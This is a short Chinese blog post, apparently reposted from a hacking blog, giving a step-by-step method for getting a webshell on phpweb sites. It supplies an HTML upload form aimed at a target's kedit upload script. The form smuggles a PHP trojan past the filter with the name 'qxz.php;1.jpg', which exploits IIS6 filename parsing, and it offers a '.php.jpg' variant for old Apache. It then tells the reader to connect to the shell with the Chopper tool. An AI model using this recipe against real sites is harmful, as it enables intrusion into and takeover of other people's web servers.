首先登录后台admin.php
登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把 www.xxx.com 改成你的目标网站地址。
代码文件如下:
<form name=”uploadForm” method=”post”
enctype=”multipart/form-data”
action=”http://www.xxx.com/kedit/upload_cgi/upload.php”>
<input
type=”text” name=”fileName” value=”qxz.php;1.jpg”
/>
<input type=”hidden” name=”attachPath”
value=”news/pics/” />
<input type=”file”
name=”fileData” size=”14″ /></td>
<input
type=”submit” name=”button” value=”确定”
/>
</form>
然后选择你的马儿再上传
上传后如果为iis6,就点击查看源码就可以找到马儿的路径了。
菜刀链接看下
PS:qxz.php;1.jpg这样的文件是允许上传的,只要服务器是IIS6就拿到webshell,低版本的apache可以试着重命名为qxz.php.jpg
代码文件下载地址:http://pan.baidu.com/s/1eRzHs
原创文章转载请注明:转载自七行者博客
本文固定链接: http://www.qxzxp.com/4117.html
关于phpweb后台拿shell简单方法。,码迷,mamicode.com
时间: 2024-08-11 09:51:52